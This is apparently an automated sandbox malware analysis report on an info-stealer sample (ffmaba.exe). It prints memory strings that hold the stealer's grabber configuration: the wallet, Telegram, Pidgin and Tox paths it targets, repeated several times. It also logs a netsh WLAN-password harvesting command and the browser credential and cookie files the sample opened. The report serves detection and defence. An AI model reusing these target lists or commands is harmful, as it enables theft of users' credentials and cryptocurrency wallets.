name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
Source: tor-real.exe, 00000019.00000003.2480126236.0000000000F99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: electroncash
Source: yt7dW9nyJK.exe, 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 2iKqyuJTFpsXTtRw9pc8q8E38SzLcjAXXgfpuQw9044ON7ezDFP6911LpNxsu4gO2M2bDuH7YEkdMGBKv
Source: ffmaba.exe, 0000000B.00000002.2257333436.0000000002831000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>.db;.tox;.ini;.json;.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>s;????????????????\s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>\wallet</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string></string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
Source: ffmaba.exe, 0000000B.00000002.2257333436.0000000002831000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>.db;.tox;.ini;.json;.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>s;????????????????\s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>\wallet</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string></string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
Source: ffmaba.exe, 0000000B.00000002.2257333436.0000000002831000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>.db;.tox;.ini;.json;.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>s;????????????????\s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>\wallet</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string></string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
Source: ffmaba.exe, 00000013.00000002.4510696537.00000000030E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $cq%AppData%`,cqdC:\Users\user\AppData\Roaming`,cqdC:\Users\user\AppData\Roaming\Binance
Source: ffmaba.exe, 0000000B.00000002.2257333436.0000000002831000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>.db;.tox;.ini;.json;.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>s;????????????????\s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>\wallet</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string></string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
Source: powershell.exe, 00000006.00000002.2116961691.0000000007BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Source: ffmaba.exe, 00000013.00000002.4510696537.00000000030E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $cq%AppData%`,cqdC:\Users\user\AppData\Roaming`,cqdC:\Users\user\AppData\Roaming\ledger live

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Yara detected Credential Stealer

Source: Yara match

File source: Process Memory Space: ffmaba.exe PID: 5624, type: MEMORYSTR

Remote Access Functionality

Source: Yara match

File source: Process Memory Space: ffmaba.exe PID: 5624, type: MEMORYSTR

Source: Yara match

File source: Process Memory Space: ffmaba.exe PID: 5624, type: MEMORYSTR